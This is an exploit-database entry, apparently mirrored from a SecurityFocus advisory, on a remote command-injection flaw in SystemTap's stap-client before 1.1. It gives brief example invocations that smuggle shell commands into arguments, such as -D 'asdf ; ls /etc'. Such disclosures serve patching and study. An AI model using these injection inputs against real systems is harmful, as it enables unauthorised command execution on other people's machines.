exploit-db-mirror/platforms/linux/remote/33535.txt
Offensive Security 9629404d0d Updated 05_28_2014
2014-05-28 04:36:16 +00:00

15 lines
No EOL
543 B
Text
Executable file

source: http://www.securityfocus.com/bid/37842/info
SystemTap is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data.
Remote attackers can exploit this issue to execute arbitrary shell commands with the privileges of the user running the application.
Versions prior to SystemTap 1.1 are vulnerable.
The following example commands are available:
stap-client \; ...
stap-client -; ...
stap-client -D 'asdf ; ls /etc' ...
stap-client -e 'script' -D 'asdf ; \; '